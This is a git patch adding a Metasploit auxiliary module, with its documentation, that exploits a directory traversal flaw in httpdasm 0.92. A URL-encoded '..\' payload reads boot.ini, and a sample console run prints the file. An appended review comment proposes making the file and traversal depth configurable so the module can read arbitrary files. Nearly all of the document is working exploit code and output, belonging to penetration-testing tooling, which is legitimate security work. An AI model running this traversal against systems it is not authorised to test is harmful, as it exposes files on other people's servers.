From 17c0bc1fa7005273dee215e40fd548e81c762da3 Mon Sep 17 00:00:00 2001
From: Wei Chen
Date: Tue, 19 Jun 2018 14:56:36 -0500
Subject: [PATCH] Land #10183, Add auxiliary mod to exploit httpdasm dir traversal vuln
---
.../http/httpdasm_directory_traversal.md | 34 +++++++++++++
.../http/httpdasm_directory_traversal.rb | 51 +++++++++++++++++++
2 files changed, 85 insertions(+)
create mode 100644 documentation/modules/auxiliary/scanner/http/httpdasm_directory_traversal.md
create mode 100644 modules/auxiliary/scanner/http/httpdasm_directory_traversal.rb
diff --git a/documentation/modules/auxiliary/scanner/http/httpdasm_directory_traversal.md b/documentation/modules/auxiliary/scanner/http/httpdasm_directory_traversal.md
new file mode 100644
index 0000000000..957b283363
--- /dev/null
+++ b/documentation/modules/auxiliary/scanner/http/httpdasm_directory_traversal.md
@@ -0,0 +1,34 @@
+## Description
+
+ This module exploits a directory traversal vulnerability to read files from a server running httpdasm v0.92.
+
+## Vulnerable Application
+
+ httpdasm 0.92
+
+## Verification Steps
+
+ 1. Start `msfconsole`
+ 2. `use [auxiliary/scanner/http/httpdasm_directory_traversal]`
+ 3. `set RHOSTS [IP]`
+ 4. `run`
+
+## Scenarios
+
+### Tested on Windows XP x86
+
+ ```
+ msf5 > use auxiliary/scanner/http/httpdasm_directory_traversal
+ msf5 auxiliary(scanner/http/httpdasm_directory_traversal) > set rhosts 192.168.37.128
+ rhosts => 192.168.37.128
+ msf5 auxiliary(scanner/http/httpdasm_directory_traversal) > run
+
+ [boot loader]
+ timeout=30
+ default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
+ [operating systems]
+ multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
+
+ [*] Auxiliary module execution completed
+ msf5 auxiliary(scanner/http/httpdasm_directory_traversal) >
+ ```
diff --git a/modules/auxiliary/scanner/http/httpdasm_directory_traversal.rb b/modules/auxiliary/scanner/http/httpdasm_directory_traversal.rb
new file mode 100644
index 0000000000..193a602916
--- /dev/null
+++ b/modules/auxiliary/scanner/http/httpdasm_directory_traversal.rb
@@ -0,0 +1,51 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Httpdasm Directory Traversal',
+ 'Description' => %q{
+ This module allows for traversing the file system of a host running httpdasm v0.92.
+ },
+ 'Author' =>
+ [
+ 'John Leitch', # EDB POC
+ 'Shelby Pace' # Metasploit Module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['EDB', '15861']
+ ]
+ ))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'Path to traverse to', '%2e%2e%5c' * 8 + 'boot.ini'])
+ ])
+
+ end
+
+ def run
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path)
+ })
+
+ if res && res.code == 200
+ print_status(res.body)
+ path = store_loot('httpdasm.file', 'application/octet-stream', rhost, res.body)
+ else
+ if res
+ print_error("Unexpected response from server: #{res.code}")
+ else
+ print_error("The server timed out.")
+ end
+ end
+ end
+end
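Review bot: `TARGETURI` in `register_options` carries the entire traversal payload (`'%2e%2e%5c' * 8 + 'boot.ini'`), so an operator cannot read a different file or adjust the depth without re-typing the encoded sequence, and in `run` the loot path returned by `store_loot` is assigned to `path` but never shown to the user. Splitting the option into `FILEPATH` and `DEPTH`, keeping `TARGETURI` as the web-root base path the way other `HttpClient` modules use it, and reporting the saved path with `print_good` makes the module reusable beyond `boot.ini`; the change is sketched below. Note also that a `200` is taken as success unconditionally, and a server that ignores the traversal may still answer `200` with a default page, so a guard such as `print_error('Empty response body') and return if res.body.to_s.empty?` before printing the body would cut one obvious false positive. Separately, the module sits under `scanner/http` yet does not include `Msf::Auxiliary::Scanner`, so as far as I can tell `RHOSTS` with more than one address will not be iterated; worth confirming against the framework version targeted.
```ruby
    register_options(
      [
        OptString.new('TARGETURI', [true, 'Base path of the httpdasm web root', '/']),
        OptString.new('FILEPATH', [true, 'File to read, relative to the drive root', 'boot.ini']),
        OptInt.new('DEPTH', [true, 'Number of encoded ..\\ sequences to prepend', 8])
      ])
# … unchanged: end of initialize …
  def run
    traversal = '%2e%2e%5c' * datastore['DEPTH']
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, traversal + datastore['FILEPATH'])
    })
# … unchanged: res / res.code == 200 check and print_status(res.body) …
      path = store_loot('httpdasm.file', 'application/octet-stream', rhost, res.body, datastore['FILEPATH'])
      print_good("File saved in: #{path}")
# … unchanged: error branches …
```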